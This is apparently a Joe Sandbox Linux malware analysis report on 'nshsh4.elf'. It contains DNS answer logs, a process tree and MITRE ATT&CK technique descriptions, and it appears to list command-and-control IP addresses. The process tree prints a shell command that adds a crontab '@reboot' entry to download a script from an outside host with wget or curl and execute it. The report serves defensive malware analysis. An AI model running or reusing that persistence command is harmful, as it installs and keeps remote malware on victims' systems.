Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:24.662003994 CEST	152.53.15.127	192.168.2.23	0x54fa	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:35.529244900 CEST	152.53.15.127	192.168.2.23	0x51b	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:41.178767920 CEST	152.53.15.127	192.168.2.23	0x1adb	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:47.113255978 CEST	185.181.61.24	192.168.2.23	0xf866	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:13:58.041903973 CEST	202.61.197.122	192.168.2.23	0x6ac	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:14:04.759337902 CEST	80.152.203.134	192.168.2.23	0x92a9	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: nshsh4.elf PID: 6253, Parent PID: 6176

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/tmp/nshsh4.elf
Arguments:	/tmp/nshsh4.elf
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Chronological Activities

Analysis Process: nshsh4.elf PID: 6255, Parent PID: 6253

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/tmp/nshsh4.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Chronological Activities

Analysis Process: sh PID: 6255, Parent PID: 6253

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6257, Parent PID: 6255

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6259, Parent PID: 6257

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6259, Parent PID: 6257

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 6258, Parent PID: 6255

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6258, Parent PID: 6255

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: nshsh4.elf PID: 6260, Parent PID: 6253

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/tmp/nshsh4.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Chronological Activities

Analysis Process: nshsh4.elf PID: 6303, Parent PID: 6260

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/tmp/nshsh4.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Chronological Activities

Analysis Process: nshsh4.elf PID: 6262, Parent PID: 6253

General

Start time (UTC):	17:11:59
Start date (UTC):	26/10/2024
Path:	/tmp/nshsh4.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report nshsh4.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/spool/cron/crontabs/tmp.L3xqaq

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: nshsh4.elf PID: 6253, Parent PID: 6176

General

Chronological Activities

Analysis Process: nshsh4.elf PID: 6255, Parent PID: 6253

General

Chronological Activities

Analysis Process: sh PID: 6255, Parent PID: 6253

General

Chronological Activities

Analysis Process: sh PID: 6257, Parent PID: 6255

General

Chronological Activities

Analysis Process: sh PID: 6259, Parent PID: 6257

General

Chronological Activities

Analysis Process: crontab PID: 6259, Parent PID: 6257

General

Chronological Activities

Analysis Process: sh PID: 6258, Parent PID: 6255

General

Linux Analysis Report
nshsh4.elf